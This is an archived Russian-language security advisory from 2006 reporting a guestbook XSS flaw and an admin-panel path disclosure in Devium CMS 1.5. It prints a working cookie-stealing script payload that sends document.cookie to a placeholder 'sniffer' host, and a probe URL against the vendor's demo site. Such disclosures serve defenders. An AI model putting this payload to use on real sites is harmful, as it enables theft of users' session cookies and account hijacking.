Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  SQuery v.x (devi.php) (armygame.
php) Remote File Inclusion

  [MajorSecurity #26] Woltlab Burning Board - Multiple Cookie manipulation and session fixation vulnerabilities

  MusicBox <= 2.3.4 XSS SQL injection Vulnerability

  SQL-Injection in Shop-Script PRO & Shop-Script Premium all version

From:Cyber Lords <fear_(at)_cyberlords.net>
Date:25 июля 2006 г.
Subject:XSS в Devium CMS 1.5

Advisory: XSS в Devium CMS 1.5

Home Page: http://www.devium.net/

Уязвимость/Vulnerability:
XSS в гостевой книге.

Exploit:
<script>img = new Image(); img.src = "http://sniffer/a.jpg?"+document.cookie;</script>

Уязвимость/Vulnerability:
Раскрытие установочного пути в админке:

http://demo.devium.net/admin/index.php?mod=links'


Copyright © Cyber Lords Community
www.cyberlords.net

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород